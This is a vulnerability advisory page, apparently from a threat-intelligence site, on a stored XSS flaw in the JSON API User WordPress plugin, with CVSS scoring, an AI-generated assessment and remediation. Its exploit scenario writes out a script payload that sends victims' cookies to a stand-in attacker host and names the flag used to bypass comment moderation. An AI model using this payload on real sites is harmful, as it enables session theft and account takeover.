Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS requires a victim to visit the injected page (UI:R); subscriber-level account to plant payload (PR:L); scope change reflects browser context escape (S:C).
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The JSON API User plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'content' parameter of the post_comment API endpoint in versions up to, and including, 4.1.0 This is due to insufficient input sanitization in the post_comment() function, which passes the attacker-controlled comment_content value directly to wp_insert_comment() without applying any HTML sanitization, and additionally allows the caller to set comment_approved=1 to self-approve the comment and bypass moderation. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the JSON API User WordPress plugin (versions ≤ 4.1.0) allows authenticated attackers with subscriber-level or higher access to inject persistent JavaScript via the content parameter of the post_comment API endpoint. The plugin's post_comment() function passes attacker-controlled comment_content directly to WordPress's native wp_insert_comment() without any HTML sanitization, and a compounding design flaw permits callers to supply comment_approved=1 to self-approve comments and entirely bypass the WordPress moderation queue. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated WordPress account with subscriber-level access or above on the target site running JSON API User plugin version 4.1.0 or earlier. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N, score 6.4) reflects network-accessible exploitation with low complexity, requiring only a subscriber-level account, with a scope change indicating the impact escapes the WordPress server and executes in victim browsers. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker self-registers a subscriber account on a WordPress site with open registration enabled, then sends a crafted POST request to the plugin's `post_comment` API endpoint with a JavaScript payload in the `content` parameter (e.g., `<script>document.location='https://attacker.example/steal?c='+document.cookie</script>`) and the `comment_approved=1` flag set. The comment is stored in the WordPress database without sanitization and immediately published, bypassing moderation. … |
| Remediation | Update the JSON API User plugin to version 4.1.2 or later, which addresses the missing sanitization in `post_comment()` and the unauthorized `comment_approved` self-approval, as evidenced by the Trac changeset at https://plugins.trac.wordpress.org/changeset?old_path=%2Fjson-api-user/tags/4.1.0&new_path=%2Fjson-api-user/tags/4.1.2. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Json Api User
View allSame weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41490
GHSA-4689-rgvq-62r3